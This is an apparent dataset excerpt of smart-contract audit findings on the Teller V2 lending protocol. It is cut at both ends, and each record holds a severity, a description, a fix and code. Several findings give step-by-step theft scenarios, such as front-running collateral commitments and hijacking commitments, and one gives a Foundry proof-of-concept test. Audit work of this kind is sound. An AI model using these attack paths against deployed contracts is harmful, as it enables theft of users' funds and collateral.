This allows lenders to be honeypot and front-run causing massive loss of funds:\\nMalicious user creates and commits a bid to take a loan of 10e18 ETH against 100,000e6 USDC with 15% APR\\nLender sees this and calls TellerV2#lenderAcceptBid\\nMalicious user front-runs transaction with commitCollateral call setting USDC to 1\\nBid is filled sending malicious user 10e18 ETH and escrowing 1 USDC\\nAttacker doesn't repay loan and has stolen 10e18 ETH for the price of 1 USDCчAllow lender to specify collateral info and check that it matches the committed addresses and amountsчBid acceptance can be front-run to cause massive losses to lendersч```\\nfunction _commitCollateral(\\n uint256 _bidId,\\n Collateral memory _collateralInfo\\n) internal virtual {\\n CollateralInfo storage collateral = _bidCollaterals[_bidId];\\n collateral.collateralAddresses.add(_collateralInfo._collateralAddress);\\n collateral.collateralInfo[\\n _collateralInfo._collateralAddress\\n ] = _collateralInfo; <- @audit-issue collateral info overwritten\\n emit CollateralCommitted(\\n _bidId,\\n _collateralInfo._collateralType,\\n _collateralInfo._collateralAddress,\\n _collateralInfo._amount,\\n _collateralInfo._tokenId\\n );\\n}\\n```\\n -_repayLoan will fail if lender is blacklistedчhighчThe internal function that repays a loan `_repayLoan` attempts to transfer the loan token back to the lender. 
If the loan token implements a blacklist like the common USDC token, the transfer may be impossible and the repayment will fail.\\nThis internal `_repayLoan` function is called during any partial / full repayment and during liquidation.\\nThe function to repay the loan to the lender directly transfers the token to the lender:\\n```\\n function _repayLoan(// rest of code) internal virtual {\\n // rest of code\\n bid.loanDetails.lendingToken.safeTransferFrom(\\n _msgSenderForMarket(bid.marketplaceId),\\n lender,\\n paymentAmount\\n );\\n // rest of code\\n```\\n\\nAny of these functions will fail if loan lender is blacklisted by the token.\\nDuring repayment the loan lender is computed by:\\n```\\n function getLoanLender(uint256 _bidId)\\n public\\n view\\n returns (address lender_)\\n {\\n lender_ = bids[_bidId].lender;\\n\\n if (lender_ == address(lenderManager)) {\\n return lenderManager.ownerOf(_bidId);\\n }\\n }\\n```\\n\\nIf the lender controls a blacklisted address, they can use the lenderManager to selectively transfer the loan to / from the blacklisted whenever they want.чUse a push/pull pattern for transferring tokens. Allow repayment of loan and withdraw the tokens of the user into `TellerV2` (or an escrow) and allow lender to withdraw the repayment from `TellerV2` (or the escrow). This way, the repayment will fail only if `TellerV2` is blacklisted.чAny lender can prevent repayment of a loan and its liquidation. In particular, a lender can wait until a loan is almost completely repaid, transfer the loan to a blacklisted address (even one they do not control) to prevent the loan to be fully repaid / liquidated. 
The loan will default and the borrower will not be able to withdraw their collateral.\nThis results in a guaranteed griefing attack on the collateral of a user.\nIf the lender controls a blacklisted address, they can additionally withdraw the collateral of the user.\nI believe the impact is high since the griefing attack is always possible whenever the lent token uses a blacklist, and results in a guaranteed loss of collateral.ч```\n    function _repayLoan(// rest of code) internal virtual {\n        // rest of code\n        bid.loanDetails.lendingToken.safeTransferFrom(\n            _msgSenderForMarket(bid.marketplaceId),\n            lender,\n            paymentAmount\n        );\n        // rest of code\n```\n -Malicious user can abuse UpdateCommitment to create commitments for other usersчhighчUpdateCommitment checks that the original lender is msg.sender but never validates that the original lender == new lender. This allows malicious users to effectively create a commitment for another user, allowing them to drain funds from them.\nLenderCommitmentForwarder.sol#L208-L224\n```\nfunction updateCommitment(\n    uint256 _commitmentId,\n    Commitment calldata _commitment\n) public commitmentLender(_commitmentId) { <- @audit-info checks that lender is msg.sender\n    require(\n        _commitment.principalTokenAddress ==\n            commitments[_commitmentId].principalTokenAddress,\n        "Principal token address cannot be updated."\n    );\n    require(\n        _commitment.marketId == commitments[_commitmentId].marketId,\n        "Market Id cannot be updated."\n    );\n\n    commitments[_commitmentId] = _commitment; <- @audit-issue never checks _commitment.lender\n\n    validateCommitment(commitments[_commitmentId]);\n```\n\nUpdateCommitment is intended to allow users to update their commitment but due to lack of verification of _commitment.lender, a malicious user can create a commitment and then update it to a new lender. 
By using bad loan parameters they can steal funds from the attacked user.чCheck that the updated lender is the same as the original lenderчUpdateCommitment can be used to create a malicious commitment for another user and steal their fundsч```\nfunction updateCommitment(\n    uint256 _commitmentId,\n    Commitment calldata _commitment\n) public commitmentLender(_commitmentId) { <- @audit-info checks that lender is msg.sender\n    require(\n        _commitment.principalTokenAddress ==\n            commitments[_commitmentId].principalTokenAddress,\n        "Principal token address cannot be updated."\n    );\n    require(\n        _commitment.marketId == commitments[_commitmentId].marketId,\n        "Market Id cannot be updated."\n    );\n\n    commitments[_commitmentId] = _commitment; <- @audit-issue never checks _commitment.lender\n\n    validateCommitment(commitments[_commitmentId]);\n```\n -lender could be forced to withdraw collateral even if he/she would rather wait for liquidation during defaultчmediumчlender could be forced to withdraw collateral even if he/she would rather wait for liquidation during default\nCollateralManager.withdraw would pass if the loan is defaulted (the borrower does not pay interest in time); in that case, anyone can trigger a withdrawal on behalf of the lender before the liquidation delay period passes.\nwithdraw logic from CollateralManager.\n```\n     * @notice Withdraws deposited collateral from the created escrow of a bid that has been successfully repaid.\n     * @param _bidId The id of the bid to withdraw collateral for.\n     */\n    function withdraw(uint256 _bidId) external {\n        BidState bidState = tellerV2.getBidState(_bidId);\n        console2.log("WITHDRAW %d", uint256(bidState));\n        if (bidState == BidState.PAID) {\n            _withdraw(_bidId, tellerV2.getLoanBorrower(_bidId));\n        } else if (tellerV2.isLoanDefaulted(_bidId)) { audit\n            _withdraw(_bidId, tellerV2.getLoanLender(_bidId));\n            emit CollateralClaimed(_bidId);\n        } else {\n            revert("collateral cannot be withdrawn");\n        
}\n    }\n```\nчCheck that the caller is the lender\n```\n    function withdraw(uint256 _bidId) external {\n        BidState bidState = tellerV2.getBidState(_bidId);\n        console2.log("WITHDRAW %d", uint256(bidState));\n        if (bidState == BidState.PAID) {\n            _withdraw(_bidId, tellerV2.getLoanBorrower(_bidId));\n        } else if (tellerV2.isLoanDefaulted(_bidId)) {\n+++     uint256 _marketplaceId = bidState.marketplaceId; \n+++     address sender = _msgSenderForMarket(_marketplaceId); \n+++     address lender = tellerV2.getLoanLender(_bidId); \n+++     require(sender == lender, "sender must be the lender"); \n            _withdraw(_bidId, lender);\n            emit CollateralClaimed(_bidId);\n        } else {\n            revert("collateral cannot be withdrawn");\n        }\n    }\n```\nчanyone can force the lender to take up collateral during the liquidation delay, and liquidation could be something that never happens. This does not match the intention based on the spec, which implies that the lender has an option: `3) When the loan is fully repaid, the borrower can withdraw the collateral. 
If the loan becomes defaulted instead, then the lender has a 24 hour grace period to claim the collateral (losing the principal)`ч```\\n * @notice Withdraws deposited collateral from the created escrow of a bid that has been successfully repaid.\\n * @param _bidId The id of the bid to withdraw collateral for.\\n */\\n function withdraw(uint256 _bidId) external {\\n BidState bidState = tellerV2.getBidState(_bidId);\\n console2.log(\"WITHDRAW %d\", uint256(bidState));\\n if (bidState == BidState.PAID) {\\n _withdraw(_bidId, tellerV2.getLoanBorrower(_bidId));\\n } else if (tellerV2.isLoanDefaulted(_bidId)) { audit\\n _withdraw(_bidId, tellerV2.getLoanLender(_bidId));\\n emit CollateralClaimed(_bidId);\\n } else {\\n revert(\"collateral cannot be withdrawn\");\\n }\\n }\\n```\\n -The calculation time methods of `calculateNextDueDate` and `_canLiquidateLoan` are inconsistentчmediumчThe calculation time methods of `calculateNextDueDate` and `_canLiquidateLoan` are inconsistent\\n```\\nFile: TellerV2.sol\\n 854 function calculateNextDueDate(uint256 _bidId)\\n 855 public\\n 856 view\\n 857 returns (uint32 dueDate_)\\n 858 {\\n 859 Bid storage bid = bids[_bidId];\\n 860 if (bids[_bidId].state != BidState.ACCEPTED) return dueDate_;\\n 861\\n 862 uint32 lastRepaidTimestamp = lastRepaidTimestamp(_bidId);\\n 863\\n 864 // Calculate due date if payment cycle is set to monthly\\n 865 if (bidPaymentCycleType[_bidId] == PaymentCycleType.Monthly) {\\n 866 // Calculate the cycle number the last repayment was made\\n 867 uint256 lastPaymentCycle = BPBDTL.diffMonths(\\n 868 bid.loanDetails.acceptedTimestamp,\\n 869 \\n```\\n\\nThe `calculateNextDueDate` function is used by the borrower to query the date of the next repayment. 
Generally speaking, the borrower will think that as long as the repayment is completed at this point in time, the collateral will not be liquidated.\\n```\\nFile: TellerV2.sol\\n 953 function _canLiquidateLoan(uint256 _bidId, uint32 _liquidationDelay)\\n 954 internal\\n 955 view\\n 956 returns (bool)\\n 957 {\\n 958 Bid storage bid = bids[_bidId];\\n 959\\n 960 // Make sure loan cannot be liquidated if it is not active\\n 961 if (bid.state != BidState.ACCEPTED) return false;\\n 962\\n 963 if (bidDefaultDuration[_bidId] == 0) return false;\\n 964\\n 965 return (uint32(block.timestamp) -\\n 966 _liquidationDelay -\\n 967 lastRepaidTimestamp(_bidId) >\\n 968 bidDefaultDuration[_bidId]);\\n 969 }\\n```\\n\\nHowever, when the `_canLiquidateLoan` function actually judges whether it can be liquidated, the time calculation mechanism is completely different from that of `calculateNextDueDate` function, which may cause that if the time point calculated by `_canLiquidateLoan` is earlier than the time point of `calculateNextDueDate` function, the borrower may also be liquidated in the case of legal repayment.\\nBorrowers cannot query the specific liquidation time point, but can only query whether they can be liquidated through the `isLoanDefaulted` function or `isLoanLiquidateable` function. 
When they query that they can be liquidated, they may have already been liquidated.чIt is recommended to verify that the liquidation time point cannot be shorter than the repayment period and allow users to query the exact liquidation time point.чBorrowers may be liquidated if repayments are made on time.ч```\\nFile: TellerV2.sol\\n 854 function calculateNextDueDate(uint256 _bidId)\\n 855 public\\n 856 view\\n 857 returns (uint32 dueDate_)\\n 858 {\\n 859 Bid storage bid = bids[_bidId];\\n 860 if (bids[_bidId].state != BidState.ACCEPTED) return dueDate_;\\n 861\\n 862 uint32 lastRepaidTimestamp = lastRepaidTimestamp(_bidId);\\n 863\\n 864 // Calculate due date if payment cycle is set to monthly\\n 865 if (bidPaymentCycleType[_bidId] == PaymentCycleType.Monthly) {\\n 866 // Calculate the cycle number the last repayment was made\\n 867 uint256 lastPaymentCycle = BPBDTL.diffMonths(\\n 868 bid.loanDetails.acceptedTimestamp,\\n 869 \\n```\\n -updateCommitmentBorrowers does not delete all existing usersчmediumчThe lender can update the list of borrowers by calling `LenderCommitmentForwarder.updateCommitmentBorrowers`. The list of borrowers is EnumerableSetUpgradeable.AddressSet that is a complex structure containing mapping. Using the `delete` keyword to `delete` this structure will not erase the mapping inside it. 
Let's look at the code of this function.\\n```\\nmapping(uint256 => EnumerableSetUpgradeable.AddressSet)\\n internal commitmentBorrowersList;\\n \\nfunction updateCommitmentBorrowers(\\n uint256 _commitmentId,\\n address[] calldata _borrowerAddressList\\n ) public commitmentLender(_commitmentId) {\\n delete commitmentBorrowersList[_commitmentId];\\n _addBorrowersToCommitmentAllowlist(_commitmentId, _borrowerAddressList);\\n }\\n```\\n\\nI wrote a similar function to prove the problem.\\n```\\nusing EnumerableSet for EnumerableSet.AddressSet;\\n mapping(uint256 => EnumerableSet.AddressSet) internal users;\\n \\n function test_deleteEnumerableSet() public {\\n uint256 id = 1;\\n address[] memory newUsers = new address[](2);\\n newUsers[0] = address(0x1);\\n newUsers[1] = address(0x2);\\n\\n for (uint256 i = 0; i < newUsers.length; i++) {\\n users[id].add(newUsers[i]);\\n }\\n delete users[id];\\n newUsers[0] = address(0x3);\\n newUsers[1] = address(0x4);\\n for (uint256 i = 0; i < newUsers.length; i++) {\\n users[id].add(newUsers[i]);\\n }\\n bool exist = users[id].contains(address(0x1));\\n if(exist) {\\n emit log_string(\"address(0x1) exist\");\\n }\\n exist = users[id].contains(address(0x2));\\n if(exist) {\\n emit log_string(\"address(0x2) exist\");\\n }\\n }\\n/*\\n[PASS] test_deleteEnumerableSet() (gas: 174783)\\nLogs:\\n address(0x1) exist\\n address(0x2) exist\\n*/\\n```\\nчIn order to clean an `EnumerableSet`, you can either remove all elements one by one or create a fresh instance using an array of `EnumerableSet`.чThe deleted Users can still successfully call `LenderCommitmentForwarder.acceptCommitment` to get a loan.ч```\\nmapping(uint256 => EnumerableSetUpgradeable.AddressSet)\\n internal commitmentBorrowersList;\\n \\nfunction updateCommitmentBorrowers(\\n uint256 _commitmentId,\\n address[] calldata _borrowerAddressList\\n ) public commitmentLender(_commitmentId) {\\n delete commitmentBorrowersList[_commitmentId];\\n 
_addBorrowersToCommitmentAllowlist(_commitmentId, _borrowerAddressList);\\n }\\n```\\n -If the collateral is a fee-on-transfer token, repayment will be blockedчmediumчAs we all know, some tokens will deduct fees when transferring token. In this way, the actual amount of token received by the receiver will be less than the amount sent. If the collateral is this type of token, the amount of collateral recorded in the contract will bigger than the actual amount. When the borrower repays the loan, the amount of collateral withdrawn will be insufficient, causing tx revert.\\nThe `_bidCollaterals` mapping of `CollateralManager` records the `CollateralInfo` of each bidId. This structure records the collateral information provided by the user when creating a bid for a loan. A lender can accept a loan by calling `TellerV2.lenderAcceptBid` that will eventually transfer the user's collateral from the user address to the CollateralEscrowV1 contract corresponding to the loan. The whole process will deduct fee twice.\\n```\\n//CollateralManager.sol\\nfunction _deposit(uint256 _bidId, Collateral memory collateralInfo)\\n internal\\n virtual\\n {\\n // rest of code// rest of code\\n // Pull collateral from borrower & deposit into escrow\\n if (collateralInfo._collateralType == CollateralType.ERC20) {\\n IERC20Upgradeable(collateralInfo._collateralAddress).transferFrom( //transferFrom first time\\n borrower,\\n address(this),\\n collateralInfo._amount\\n );\\n IERC20Upgradeable(collateralInfo._collateralAddress).approve(\\n escrowAddress,\\n collateralInfo._amount\\n );\\n collateralEscrow.depositAsset( //transferFrom second time\\n CollateralType.ERC20,\\n collateralInfo._collateralAddress,\\n collateralInfo._amount, //this value is from user's input\\n 0\\n );\\n }\\n // rest of code// rest of code\\n }\\n```\\n\\nThe amount of collateral recorded by the CollateralEscrowV1 contract is equal to the amount originally submitted by the user.\\nWhen the borrower repays the loan, 
`collateralManager.withdraw` will be triggered. This function internally calls `CollateralEscrowV1.withdraw`. Since the balance of the collateral in the CollateralEscrowV1 contract is less than the amount to be withdrawn, the entire transaction reverts.\\n```\\n//CollateralEscrowV1.sol\\nfunction _withdrawCollateral(\\n Collateral memory _collateral,\\n address _collateralAddress,\\n uint256 _amount,\\n address _recipient\\n ) internal {\\n // Withdraw ERC20\\n if (_collateral._collateralType == CollateralType.ERC20) {\\n IERC20Upgradeable(_collateralAddress).transfer( //revert\\n _recipient,\\n _collateral._amount //_collateral.balanceOf(address(this)) < _collateral._amount\\n );\\n }\\n // rest of code// rest of code\\n }\\n```\\nчTwo ways to fix this issue.\\nThe `afterBalance-beforeBalance` method should be used when recording the amount of collateral.\\n` --- a/teller-protocol-v2/packages/contracts/contracts/escrow/CollateralEscrowV1.sol\\n +++ b/teller-protocol-v2/packages/contracts/contracts/escrow/CollateralEscrowV1.sol\\n @@ -165,7 +165,7 @@ contract CollateralEscrowV1 is OwnableUpgradeable, ICollateralEscrowV1 {\\n if (_collateral._collateralType == CollateralType.ERC20) {\\n IERC20Upgradeable(_collateralAddress).transfer(\\n _recipient,\\n - _collateral._amount\\n + IERC20Upgradeable(_collateralAddress).balanceOf(address(this))\\n );\\n }`чThe borrower's collateral is stuck in the instance of CollateralEscrowV1. 
Non-professional users will never know that they need to manually transfer some collateral into CollateralEscrowV1 to successfully repay.\\nThis issue blocked the user's repayment, causing the loan to be liquidated.\\nThe liquidator will not succeed by calling `TellerV2.liquidateLoanFull`.ч```\\n//CollateralManager.sol\\nfunction _deposit(uint256 _bidId, Collateral memory collateralInfo)\\n internal\\n virtual\\n {\\n // rest of code// rest of code\\n // Pull collateral from borrower & deposit into escrow\\n if (collateralInfo._collateralType == CollateralType.ERC20) {\\n IERC20Upgradeable(collateralInfo._collateralAddress).transferFrom( //transferFrom first time\\n borrower,\\n address(this),\\n collateralInfo._amount\\n );\\n IERC20Upgradeable(collateralInfo._collateralAddress).approve(\\n escrowAddress,\\n collateralInfo._amount\\n );\\n collateralEscrow.depositAsset( //transferFrom second time\\n CollateralType.ERC20,\\n collateralInfo._collateralAddress,\\n collateralInfo._amount, //this value is from user's input\\n 0\\n );\\n }\\n // rest of code// rest of code\\n }\\n```\\n -LenderCommitmentForwarder#updateCommitment can be front-run by malicious borrower to cause lender to over-commit fundsчmediumчThis is the same idea as approve vs increaseAlllowance. updateCommitment is a bit worse though because there are more reason why a user may wish to update their commitment (expiration, collateral ratio, interest rate, etc).\\nLenderCommitmentForwarder.sol#L212-L222\\n```\\n require(\\n _commitment.principalTokenAddress ==\\n commitments[_commitmentId].principalTokenAddress,\\n \"Principal token address cannot be updated.\"\\n );\\n require(\\n _commitment.marketId == commitments[_commitmentId].marketId,\\n \"Market Id cannot be updated.\"\\n );\\n\\n commitments[_commitmentId] = _commitment;\\n```\\n\\nLenderCommitmentForwarder#updateCommitment overwrites ALL of the commitment data. 
This means that even if a user is calling it to update even one value the maxPrincipal will reset, opening up the following attack vector:\\nUser A creates a commitment for 100e6 USDC lending against ETH\\nUser A's commitment is close to expiry so they call to update their commitment with a new expiration\\nUser B sees this update and front-runs it with a loan against the commitment for 100e6 USDC\\nUser A's commitment is updated and the amount is set back to 100e6 USDC\\nUser B takes out another loan for 100e6 USDC\\nUser A has now loaned out 200e6 USDC when they only meant to loan 100e6 USDCчCreate a function that allows users to extend expiry while keeping amount unchanged. Additionally create a function similar to increaseApproval which increase amount instead of overwriting amount.чCommitment is abused to over-commit lenderч```\\n require(\\n _commitment.principalTokenAddress ==\\n commitments[_commitmentId].principalTokenAddress,\\n \"Principal token address cannot be updated.\"\\n );\\n require(\\n _commitment.marketId == commitments[_commitmentId].marketId,\\n \"Market Id cannot be updated.\"\\n );\\n\\n commitments[_commitmentId] = _commitment;\\n```\\n -Bid submission vulnerable to market parameters changesчmediumчThe details for the audit state:\\nMarket owners should NOT be able to race-condition attack borrowers or lenders by changing market settings while bids are being submitted or accepted (while tx are in mempool). 
Care has been taken to ensure that this is not possible (similar in theory to sandwich attacking but worse as if possible it could cause unexpected and non-consentual interest rate on a loan) and further-auditing of this is welcome.\\nHowever, there is little protection in place to protect the submitter of a bid from changes in market parameters.\\nIn _submitBid(), certain bid parameters are taken from the marketRegistry:\\n```\\n function _submitBid(// rest of code)\\n // rest of code\\n (bid.terms.paymentCycle, bidPaymentCycleType[bidId]) = marketRegistry\\n .getPaymentCycle(_marketplaceId);\\n\\n bid.terms.APR = _APR;\\n\\n bidDefaultDuration[bidId] = marketRegistry.getPaymentDefaultDuration(\\n _marketplaceId\\n );\\n\\n bidExpirationTime[bidId] = marketRegistry.getBidExpirationTime(\\n _marketplaceId\\n );\\n\\n bid.paymentType = marketRegistry.getPaymentType(_marketplaceId);\\n \\n bid.terms.paymentCycleAmount = V2Calculations\\n .calculatePaymentCycleAmount(\\n bid.paymentType,\\n bidPaymentCycleType[bidId],\\n _principal,\\n _duration,\\n bid.terms.paymentCycle,\\n _APR\\n );\\n // rest of code\\n```\\nчTake every single parameters as input of `_submitBid()` (including fee percents) and compare them to the values in `marketRegistry` to make sure borrower agrees with them, revert if they differ.чIf market parameters are changed in between the borrower submitting a bid transaction and the transaction being applied, borrower may be subject to changes in `bidDefaultDuration`, `bidExpirationTime`, `paymentType`, `paymentCycle`, `bidPaymentCycleType` and `paymentCycleAmount`.\\nThat is, the user may be committed to the bid for longer / shorter than expected. They may have a longer / shorter default duration (time for the loan being considered defaulted / eligible for liquidation). 
They have un-provisioned for payment type and cycle parameters.\\nI believe most of this will have a medium impact on borrower (mild inconveniences / resolvable by directly repaying the loan) if the market owner is not evil and adapting the parameters reasonably.\\nAn evil market owner can set the value of `bidDefaultDuration` and `paymentCycle` very low (0) so that the loan will default immediately. It can then accept the bid, make user default immediately, and liquidate the loan to steal the user's collateral. This results in a loss of collateral for the borrower.ч```\\n function _submitBid(// rest of code)\\n // rest of code\\n (bid.terms.paymentCycle, bidPaymentCycleType[bidId]) = marketRegistry\\n .getPaymentCycle(_marketplaceId);\\n\\n bid.terms.APR = _APR;\\n\\n bidDefaultDuration[bidId] = marketRegistry.getPaymentDefaultDuration(\\n _marketplaceId\\n );\\n\\n bidExpirationTime[bidId] = marketRegistry.getBidExpirationTime(\\n _marketplaceId\\n );\\n\\n bid.paymentType = marketRegistry.getPaymentType(_marketplaceId);\\n \\n bid.terms.paymentCycleAmount = V2Calculations\\n .calculatePaymentCycleAmount(\\n bid.paymentType,\\n bidPaymentCycleType[bidId],\\n _principal,\\n _duration,\\n bid.terms.paymentCycle,\\n _APR\\n );\\n // rest of code\\n```\\n -EMI last payment not handled perfectly could lead to borrower losing collateralsчmediumчThe ternary logic of `calculateAmountOwed()` could have the last EMI payment under calculated, leading to borrower not paying the owed principal and possibly losing the collaterals if care has not been given to.\\nSupposing Bob has a loan duration of 100 days such that the payment cycle is evenly spread out, i.e payment due every 10 days, here is a typical scenario:\\nBob has been making his payment due on time to avoid getting marked delinquent. 
For the last payment due, Bob decides to make it 5 minutes earlier just to make sure he will not miss it.\\nHowever, `duePrincipal_` ends up assigned the minimum of `owedAmount - interest_` and `owedPrincipal_`, where the former is chosen since `oweTime` is less than _bid.terms.paymentCycle:\\n```\\n } else {\\n // Default to PaymentType.EMI\\n // Max payable amount in a cycle\\n // NOTE: the last cycle could have less than the calculated payment amount\\n uint256 maxCycleOwed = isLastPaymentCycle\\n ? owedPrincipal_ + interest_\\n : _bid.terms.paymentCycleAmount;\\n\\n // Calculate accrued amount due since last repayment\\n uint256 owedAmount = (maxCycleOwed * owedTime) /\\n _bid.terms.paymentCycle;\\n duePrincipal_ = Math.min(owedAmount - interest_, owedPrincipal_);\\n }\\n```\\n\\nHence, in `_repayLoan()`, `paymentAmount >= _owedAmount` equals false failing to close the loan to have the collaterals returned to Bob:\\n```\\n if (paymentAmount >= _owedAmount) {\\n paymentAmount = _owedAmount;\\n bid.state = BidState.PAID;\\n\\n // Remove borrower's active bid\\n _borrowerBidsActive[bid.borrower].remove(_bidId);\\n\\n // If loan is is being liquidated and backed by collateral, withdraw and send to borrower\\n if (_shouldWithdrawCollateral) {\\n collateralManager.withdraw(_bidId);\\n }\\n\\n emit LoanRepaid(_bidId);\\n```\\n\\nWhile lingering and not paying too much attention to the collateral still in escrow, Bob presumes his loan is now settled.\\nNext, Alex the lender has been waiting for this golden opportunity and proceeds to calling `CollateralManager.withdraw()` to claim all collaterals as soon as the loan turns defaulted.чConsider refactoring the affected ternary logic as follows:\\n```\\n } else {\\n// Add the line below\\n duePrincipal = isLastPaymentCycle\\n// Add the line below\\n ? 
owedPrincipal\\n// Add the line below\\n : (_bid.terms.paymentCycleAmount * owedTime) / _bid.terms.paymentCycle;\\n\\n // Default to PaymentType.EMI\\n // Max payable amount in a cycle\\n // NOTE: the last cycle could have less than the calculated payment amount\\n// Remove the line below\\n uint256 maxCycleOwed = isLastPaymentCycle\\n// Remove the line below\\n ? owedPrincipal_ // Add the line below\\n interest_\\n// Remove the line below\\n : _bid.terms.paymentCycleAmount;\\n\\n // Calculate accrued amount due since last repayment\\n// Remove the line below\\n uint256 owedAmount = (maxCycleOwed * owedTime) /\\n// Remove the line below\\n _bid.terms.paymentCycle;\\n// Remove the line below\\n duePrincipal_ = Math.min(owedAmount // Remove the line below\\n interest_, owedPrincipal_);\\n }\\n```\\nчBob ended up losing all collaterals for the sake of the minute amount of loan unpaid whereas Alex receives almost all principal plus interests on top of the collaterals.ч```\\n } else {\\n // Default to PaymentType.EMI\\n // Max payable amount in a cycle\\n // NOTE: the last cycle could have less than the calculated payment amount\\n uint256 maxCycleOwed = isLastPaymentCycle\\n ? owedPrincipal_ + interest_\\n : _bid.terms.paymentCycleAmount;\\n\\n // Calculate accrued amount due since last repayment\\n uint256 owedAmount = (maxCycleOwed * owedTime) /\\n _bid.terms.paymentCycle;\\n duePrincipal_ = Math.min(owedAmount - interest_, owedPrincipal_);\\n }\\n```\\n -defaulting doesn't change the state of the loanчmediumчThe lender can claim the borrowers collateral in case they have defaulted on their payments. 
This however does not change the state of the loan so the borrower can continue making payments to the lender even though the loan is defaulted.\\n```\\nFile: CollateralManager.sol\\n\\n } else if (tellerV2.isLoanDefaulted(_bidId)) {\\n _withdraw(_bidId, tellerV2.getLoanLender(_bidId)); // sends collateral to lender\\n emit CollateralClaimed(_bidId);\\n } else {\\n```\\n\\nSince this is in `CollateralManager` nothing is updating the state kept in `TellerV2` which will still be `ACCEPTED`. The lender could still make payments (in vain).чRemove the possibility for the lender to default the loan in `CollateralManager`. Move defaulting to `TellerV2` so it can properly close the loan.чThe borrower can continue paying unknowing that the loan is defaulted. The lender could, given a defaulted loan, see that the lender is trying to save their loan and front run the late payment with a seize of collateral. Then get both the late payment and the collateral. This is quite an unlikely scenario though.\\nThe loan will also be left active since even if the borrower pays the `withdraw` of collateral will fail since the collateral is no longer there.ч```\\nFile: CollateralManager.sol\\n\\n } else if (tellerV2.isLoanDefaulted(_bidId)) {\\n _withdraw(_bidId, tellerV2.getLoanLender(_bidId)); // sends collateral to lender\\n emit CollateralClaimed(_bidId);\\n } else {\\n```\\n -bids can be created against markets that doesn't existчmediumчBids can be created against markets that does not yet exist. When this market is created, the bid can be accepted but neither defaulted/liquidated nor repaid.\\nThere's no verification that the market actually exists when submitting a bid. Hence a user could submit a bid for a non existing market.\\nFor it to not revert it must have 0% APY and the bid cannot be accepted until a market exists.\\nHowever, when this market is created the bid can be accepted. 
Then the loan would be impossible to default/liquidate:\\n```\\nFile: TellerV2.sol\\n\\n if (bidDefaultDuration[_bidId] == 0) return false;\\n```\\n\\nSince `bidDefaultDuration[_bidId]` will be `0`\\nAny attempt to repay will revert due to division by 0:\\n```\\nFile: libraries/V2Calculations.sol\\n\\n uint256 owedAmount = (maxCycleOwed * owedTime) /\\n _bid.terms.paymentCycle; \\n```\\n\\nSince `_bid.terms.paymentCycle` will also be `0` (and it will always end up in this branch since `PaymentType` will be EMI (0)).\\nHence the loan can never be closed.\\nPoC:\\n```\\n// SPDX-License-Identifier: MIT\\npragma solidity ^0.8.0;\\n\\nimport { UpgradeableBeacon } from \"@openzeppelin/contracts/proxy/beacon/UpgradeableBeacon.sol\";\\n\\nimport { TellerV2 } from \"../contracts/TellerV2.sol\";\\nimport { CollateralManager } from \"../contracts/CollateralManager.sol\";\\nimport { LenderCommitmentForwarder } from \"../contracts/LenderCommitmentForwarder.sol\";\\nimport { CollateralEscrowV1 } from \"../contracts/escrow/CollateralEscrowV1.sol\";\\nimport { MarketRegistry } from \"../contracts/MarketRegistry.sol\";\\n\\nimport { ReputationManagerMock } from \"../contracts/mock/ReputationManagerMock.sol\";\\nimport { LenderManagerMock } from \"../contracts/mock/LenderManagerMock.sol\";\\nimport { TellerASMock } from \"../contracts/mock/TellerASMock.sol\";\\n\\nimport {TestERC20Token} from \"./tokens/TestERC20Token.sol\";\\n\\nimport \"lib/forge-std/src/Test.sol\";\\nimport \"lib/forge-std/src/StdAssertions.sol\";\\n\\ncontract LoansTest is Test {\\n MarketRegistry marketRegistry;\\n TellerV2 tellerV2;\\n \\n TestERC20Token principalToken;\\n\\n address alice = address(0x1111);\\n address bob = address(0x2222);\\n address owner = address(0x3333);\\n\\n function setUp() public {\\n tellerV2 = new TellerV2(address(0));\\n\\n marketRegistry = new MarketRegistry();\\n TellerASMock tellerAs = new TellerASMock();\\n marketRegistry.initialize(tellerAs);\\n\\n LenderCommitmentForwarder 
lenderCommitmentForwarder = \\n new LenderCommitmentForwarder(address(tellerV2),address(marketRegistry));\\n CollateralManager collateralManager = new CollateralManager();\\n collateralManager.initialize(address(new UpgradeableBeacon(address(new CollateralEscrowV1()))),\\n address(tellerV2));\\n address rm = address(new ReputationManagerMock());\\n address lm = address(new LenderManagerMock());\\n tellerV2.initialize(0, address(marketRegistry), rm, address(lenderCommitmentForwarder),\\n address(collateralManager), lm);\\n\\n principalToken = new TestERC20Token(\"Principal Token\", \"PRIN\", 12e18, 18);\\n }\\n\\n function testSubmitBidForNonExistingMarket() public {\\n uint256 amount = 12e18;\\n principalToken.transfer(bob,amount);\\n\\n vm.prank(bob);\\n principalToken.approve(address(tellerV2),amount);\\n\\n // alice places bid on non-existing market\\n vm.prank(alice);\\n uint256 bidId = tellerV2.submitBid(\\n address(principalToken),\\n 1, // non-existing right now\\n amount,\\n 360 days,\\n 0, // any APY != 0 will cause revert on div by 0\\n \"\",\\n alice\\n );\\n\\n // bid cannot be accepted before market\\n vm.expectRevert(); // div by 0\\n vm.prank(bob);\\n tellerV2.lenderAcceptBid(bidId);\\n\\n vm.startPrank(owner);\\n uint256 marketId = marketRegistry.createMarket(\\n owner,\\n 30 days,\\n 30 days,\\n 1 days,\\n 0,\\n false,\\n false,\\n \"\"\\n );\\n marketRegistry.setMarketFeeRecipient(marketId, owner);\\n vm.stopPrank();\\n\\n // lender takes bid\\n vm.prank(bob);\\n tellerV2.lenderAcceptBid(bidId);\\n\\n // should be liquidatable now\\n vm.warp(32 days);\\n\\n // loan cannot be defaulted/liquidated\\n assertFalse(tellerV2.isLoanDefaulted(bidId));\\n assertFalse(tellerV2.isLoanLiquidateable(bidId));\\n\\n vm.startPrank(alice);\\n principalToken.approve(address(tellerV2),12e18);\\n\\n // and loan cannot be repaid\\n vm.expectRevert(); // division by 0\\n tellerV2.repayLoanFull(bidId);\\n vm.stopPrank();\\n }\\n}\\n```\\nчWhen submitting a bid, verify 
